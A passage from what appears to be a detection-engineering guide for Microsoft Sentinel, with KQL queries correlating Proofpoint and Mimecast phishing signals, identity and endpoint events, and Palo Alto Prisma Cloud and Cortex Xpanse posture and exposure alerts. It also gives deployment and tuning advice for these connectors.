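    | project SigninTime = TimeGenerated, UserPrincipalName, IPAddress, AppDisplayName
) on $left.ClickIP == $right.IPAddress
| where SigninTime between (ClickTime .. (ClickTime + 1h))
| project ClickTime, Recipient, URL, ClickIP, SigninTime, UserPrincipalName, AppDisplayName
```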
Likewise, anomalous Azure AD sign-ins (impossible travel, MFA failure) after a suspicious email can strengthen the case.

Endpoints (Defender): Once a user clicks a bad link or opens a malicious attachment (captured in TAP or Mimecast logs), watch for follow-on behaviors. For instance, use Sentinel’s DeviceSecurityEvents or DeviceProcessEvents to see if that user’s machine launched unusual processes. The threatID or URL hash from email events can be looked up in Defender’s file data. Correlate by username (if available) or IP: if the email log shows a link click from IP X, check whether any endpoint alerts or logon events occurred from X around the same time. As the Mimecast integration touts, this enables “correlation across Mimecast events, cloud, endpoint, and network data”.

Threat Intelligence: Use Sentinel’s ThreatIntelligenceIndicator table or Microsoft’s TI feeds to tag known-bad URLs/domains in the email logs. For example, join ProofPointTAPClicksBlockedV2_CL on the clicked URL against URL-type indicators in ThreatIntelligenceIndicator to automatically flag hits. Proofpoint’s logs already classify threats (malware/phish) and provide a threatID, which you can enrich with external intel (e.g. check whether the hash appears in TI feeds). Mimecast’s URL logs include a urlCategory field, which can be mapped to known malicious categories. Automated playbooks can also pull intel: e.g. use Sentinel’s TI REST API or watchlists containing phishing domains to annotate events.

In summary, a robust detection strategy might look like: (1) Identify malicious email events (high phish scores, quarantines, URL clicks). (2) Correlate these events by user with Azure AD logs (did the user log in from a new IP after a phish click?). (3) Correlate with endpoint alerts (Defender found malware on that device). (4) Augment with threat intelligence lookups on URLs and attachments from the email logs.
By linking the Proofpoint/Mimecast signals to identity and endpoint events, one can detect the full attack chain from email compromise to endpoint breach.

KQL Queries

Here are representative Kusto queries for common phishing scenarios (adapt table/field names as needed):

Malicious URL Click Detection: Identify users who clicked known-malicious URLs. For example, join TAP click logs to TI indicators:

```kql
let TI = ThreatIntelligenceIndicator
| where Active == true and isnotempty(Url)
| project Url, Description;
ProofPointTAPClicksPermittedV2_CL
| where url_s != ""
| project ClickTime = TimeGenerated, Recipient = recipient_s, URL = url_s, SenderIP = senderIP_s
| join kind=inner (TI) on $left.URL == $right.Url
| project ClickTime, Recipient, URL, Description
```

This flags any permitted click where the URL matches a known threat indicator. Alternatively, aggregate by domain:

```kql
ProofPointTAPClicksPermittedV2_CL
| extend clickedDomain = extract(@"https?://([^/]+)", 1, url_s)
| summarize ClickCount = count() by clickedDomain
| where clickedDomain has "maliciousdomain.com" or clickedDomain has "phish.example.com"
```

Quarantine Spike (Burst) Detection: Detect sudden spikes in quarantined messages, for example using the POD mail log:

```kql
ProofpointPODMailLog_CL
| where action_s == "Held"
| summarize HeldCount = count() by bin(TimeGenerated, 1h)
| order by TimeGenerated desc
| where HeldCount > 100
```

This finds hours with an unusually high number of held (quarantined) emails, which may indicate a phishing campaign. You could similarly use ProofPointTAPMessagesBlockedV2_CL.

Targeted User Phishing: Find whether a specific user received multiple malicious emails, e.g. for a given recipient (the address is redacted in the query below). This lists recent phish attempts targeting that user; you might also join with TAP click logs to see whether they clicked anything.
```kql
ProofpointPODMessage_CL
| where recipient_s has "email address removed for privacy reasons"   // substitute the target address
| where threatsInfoMap_classification_s == "Phish"
| project TimeGenerated, sender_s, subject_s, Threat = threatsInfoMap_threat_s
```

Campaign-Level Analysis: Group emails by Proofpoint campaign ID to see the scope of each campaign:

```kql
ProofpointPODMessage_CL
| where isnotempty(threatsInfoMap_campaignId_s)
| summarize Recipients = make_set(recipient_s), RecipientCount = dcount(recipient_s),
            SampleSubject = take_any(subject_s) by CampaignID = threatsInfoMap_campaignId_s
```

This shows each campaign ID with how many unique recipients were hit and one example subject. Combining TAP and POD tables on GUID_s or QID_s can further link click events back to the originating message/campaign.

Each query can be refined (for instance, filtering only within a recent time window) and embedded in Sentinel analytics rules or hunting. The key is using the connectors’ fields – URLs, sender/recipient addresses, campaign IDs – to pivot between email data and other security signals.

Cloud Posture + Attack Surface Signals in Microsoft Sentinel (Prisma Cloud + Cortex Xpanse)
Microsoft expanded Microsoft Sentinel’s connector ecosystem with Palo Alto integrations that pull cloud posture, cloud workload runtime, and external attack surface signals into the SIEM, so your SOC can correlate “what’s exposed” and “what’s misconfigured” with “what’s actively being attacked.” Specifically, the Ignite connectors list includes Palo Alto: Cortex Xpanse CCF and Palo Alto: Prisma Cloud CWPP.

Why these connectors matter for Sentinel detection engineering

Traditional SIEM pipelines ingest “events.” But exposure and posture are just as important as the events, because they tell you which incidents actually matter.

Attack surface (Xpanse) tells you what’s reachable from the internet and what attackers can see.
Posture (Prisma CSPM) tells you which controls are broken (public storage, permissive IAM, weak network paths).
Runtime (Prisma CWPP) tells you what’s actively happening inside workloads (containers/hosts/serverless).

In Sentinel, these become powerful when you can join them with your “classic” telemetry (cloud activity logs, NSG flow logs, DNS, endpoint, identity). Result: fewer false positives, faster triage, better prioritization.

Connector overview (what each one ingests)

1) Palo Alto Prisma Cloud CSPM Solution
What comes in: Prisma Cloud CSPM alerts + audit logs via the Prisma Cloud CSPM API.
What it ships with: connector + parser + workbook + analytics rules + hunting queries + playbooks (prebuilt content).
Best for: misconfiguration alerts (public storage, overly permissive IAM, weak encryption, risky network exposure), plus compliance posture drift and audit readiness (prove you’re monitoring and responding).

2) Palo Alto Prisma Cloud CWPP (Preview)
What comes in: CWPP alerts via the Prisma Cloud API (Compute/runtime side).
Implementation detail: built on the Codeless Connector Platform (CCP).
Best for: runtime detections (host/container/serverless security alerts) and “exploit succeeded” signals that you need to correlate with posture and exposure.
3) Palo Alto Cortex Xpanse CCF
What comes in: alert logs fetched from the Cortex Xpanse API, ingested using the Microsoft Sentinel Codeless Connector Framework (CCF).
Important: supports DCR-based ingestion-time transformations that parse into a custom table for better performance.
Best for: external exposure findings and “internet-facing risk” detection; turning exposure into incidents only when the asset is critical or actively targeted.

Reference architecture (how the data lands in Sentinel)

Here’s the mental model you want for all three:

```mermaid
flowchart LR
  A[Palo Alto Prisma Cloud CSPM] -->|CSPM API: alerts + audit logs| S[Sentinel Data Connector]
  B[Palo Alto Prisma Cloud CWPP] -->|Prisma API: runtime alerts| S
  C[Cortex Xpanse] -->|Xpanse API: exposure alerts| S
  S -->|CCF/CCP + DCR Transform| T[(Custom Tables)]
  T --> K[KQL Analytics + Hunting]
  K --> I[Incidents]
  I --> P[SOAR Playbooks]
  K --> W[Workbooks / Dashboards]
```

Key design point: Xpanse explicitly emphasizes DCR transformations at ingestion time; use them to normalize fields early so your queries stay fast under load.

Deployment patterns (practical, SOC-friendly setup)

Step 0 — Decide what goes to “analytics” vs “storage”
If you’re using Sentinel’s data lake strategy, posture/exposure data is a perfect candidate for longer retention (trend + audit), while only high-severity findings may need real-time analytics.

Step 1 — Install solutions from Content Hub
Install:
Palo Alto Prisma Cloud CSPM Solution
Palo Alto Prisma Cloud CWPP (Preview)
Palo Alto Cortex Xpanse CCF

Step 2 — Credentials & least privilege
Create dedicated service accounts / API keys in Palo Alto products with read-only scope for: CSPM alerts + audit, CWPP alerts, Xpanse alerts/exposures.

Step 3 — Validate ingestion (don’t skip this)
In Sentinel Logs, locate the custom tables created by each solution (Tables blade).
Run a basic sanity query: “All events last 1h”, “Top 20 alert types”, “Distinct severities”.
Tip: Save “ingestion smoke tests” as Hunting queries so you can re-run them after upgrades.

Step 4 — Turn on included analytics content (then tune)
The Prisma Cloud CSPM solution comes with multiple analytics rules, hunting queries, and playbooks out of the box—enable them gradually and tune thresholds before going wide.

Detection engineering: high-signal correlation recipes

Below are patterns that consistently outperform “single-source alerts.” I’m giving them as KQL templates using placeholder table names because your exact custom table names/columns are workspace-dependent (you’ll see them after install).

Recipe 1 — “Internet-exposed + actively probed” (Xpanse + network logs)
Goal: Only fire when exposure is real and there’s traffic evidence.

```kql
let xpanse = <XpanseTable>
| where TimeGenerated > ago(24h)
| where Severity in ("High","Critical")
| project AssetIp=<ip_field>, Finding=<finding_field>, Severity, TimeGenerated;
let net = <NetworkFlowTable>
| where TimeGenerated > ago(24h)
| where Direction == "Inbound"
| summarize Hits=count(), SrcIps=make_set(SrcIp, 50) by DstIp;
xpanse
| join kind=inner (net) on $left.AssetIp == $right.DstIp
| where Hits > 50
| project TimeGenerated, Severity, Finding, AssetIp, Hits, SrcIps
```

Why it works: Xpanse gives you exposure. Flow/WAF/Firewall gives you intent.

Recipe 2 — “Misconfiguration that creates a breach path” (CSPM + identity or cloud activity)
Goal: Prioritize posture findings that coincide with suspicious access or admin changes.
```kql
let posture = <PrismaCSPMTable>
| where TimeGenerated > ago(7d)
| where PolicySeverity in ("High","Critical")
| where FindingType has_any ("Public", "OverPermissive", "NoMFA", "EncryptionDisabled")
| project ResourceId=<resource_id>, Finding=<finding>, PolicySeverity, FirstSeen=TimeGenerated;
let activity = <CloudActivityTable>
| where TimeGenerated > ago(7d)
| where OperationName has_any ("RoleAssignmentWrite","SetIamPolicy","AddMember","CreateAccessKey")
| project ResourceId=<resource_id>, Actor=<caller>, OperationName, TimeGenerated;
posture
| join kind=inner (activity) on ResourceId
| project PolicySeverity, Finding, OperationName, Actor, FirstSeen, TimeGenerated
| order by PolicySeverity desc, TimeGenerated desc
```

Recipe 3 — “Runtime alert on a workload that was already high-risk” (CWPP + CSPM)
Goal: Raise severity when runtime alerts occur on assets with known posture debt.

```kql
let risky_assets = <PrismaCSPMTable>
| where TimeGenerated > ago(30d)
| where PolicySeverity in ("High","Critical")
| summarize RiskyFindings=count() by AssetId=<asset_id>;
<CWPPTable>
| where TimeGenerated > ago(24h)
| project AssetId=<asset_id>, AlertName=<alert>, Severity=<severity>, TimeGenerated, Details=<details>
| join kind=leftouter (risky_assets) on AssetId
| extend RiskScore = coalesce(RiskyFindings, 0)
| order by Severity desc, RiskScore desc, TimeGenerated desc
```

SOC outcome: the same runtime alert gets a different priority depending on posture risk.

Operational guidance (in real life)

1) Normalize severities early
Since Xpanse uses DCR transforms, normalize severity to a consistent enum (“Informational/Low/Medium/High/Critical”) to simplify analytics.

2) Deduplicate exposure findings
Attack surface tools can generate repeated findings.
Use a dedup function (a hash of asset + finding type + port/service) and alert only on new or changed exposure.

3) Don’t incident-everything
Treat CSPM findings as:
Incidents only when: critical + reachable + targeted, OR tied to privileged activity.
Tickets when: high risk but not active.
Backlog when: medium/low with compensating controls.

4) Make SOAR “safe by default”
Automations should prefer reversible actions: block IP (temporary), add to watchlist, notify owners, open a ticket with an evidence bundle. Only escalate to destructive actions after confidence thresholds are met.
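The dedup approach in point 2 above can be sketched in KQL using the same placeholder convention as the recipes: hash a stable key and keep only findings whose key wasn't seen in the previous week. Everything in angle brackets is workspace-specific.

```kql
// Alert only on new-or-changed exposure: key = asset + finding type + port.
// <XpanseTable> and the <...> fields are placeholders per the recipe convention.
let current = <XpanseTable>
| where TimeGenerated > ago(1d)
| extend DedupKey = hash_sha256(strcat(<asset_field>, "|", <finding_field>, "|", tostring(<port_field>)));
let seen = <XpanseTable>
| where TimeGenerated between (ago(8d) .. ago(1d))
| extend DedupKey = hash_sha256(strcat(<asset_field>, "|", <finding_field>, "|", tostring(<port_field>)))
| distinct DedupKey;
current
| join kind=leftanti (seen) on DedupKey   // keep rows with no prior match
| project TimeGenerated, <asset_field>, <finding_field>, Severity
```

A leftanti join is the natural fit here: it emits only current findings absent from the lookback set, so unchanged exposures stay quiet.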